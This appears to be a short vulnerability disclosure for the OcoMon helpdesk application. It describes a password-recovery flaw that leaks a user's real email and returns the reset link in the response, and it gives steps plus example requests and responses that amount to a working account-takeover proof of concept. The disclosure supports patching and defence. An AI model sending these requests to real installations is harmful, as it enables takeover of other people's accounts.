Through password recovery its possible to obtain a token to reset password of any user.
The vulnerability occurs because the application validates the email in database and returns the real email to the user.
If username and email are valid, the application returns to user the link to reset the password instead of sending it by email.
- Access "Esqueci minha senha:
- Enter a valid username (example: admin) and a fake email.
- The user's real email will be exposed in the response:
- Send the request again replacing the fake email to user original email:
- In the request response have the link to change the user's password, just access and change:
Examples:
URL: https://ocomon.site/includes/common/require_access_recovery_process.php
DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&email=anything@email.com&action=require_recovery
RESPONSE: "action":"require_recovery","field_id":"email","login_name":"admin","email":"anything@email.com","user_id":"1","name":"Administrador do Sistema","mail_to":"realemail@email.com"}
URL: https://ocomon.site/includes/common/require_access_recovery_process.php
DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&email=realemail@email.com&action=require_recovery
RESPONSE: "action":"require_recovery","field_id":"","login_name":"admin","email":"realemail@email.com","user_id":"1","name":"Administrador do Sistema","mail_to":"realemail@email.com","rand":"b39abfbd697e566d178e678462b0b6c1","forget_link":"https:\/\/ocomon.site\/setNewPass.php?code=1|b39abfbd697e566d178e678462b0b6c1"}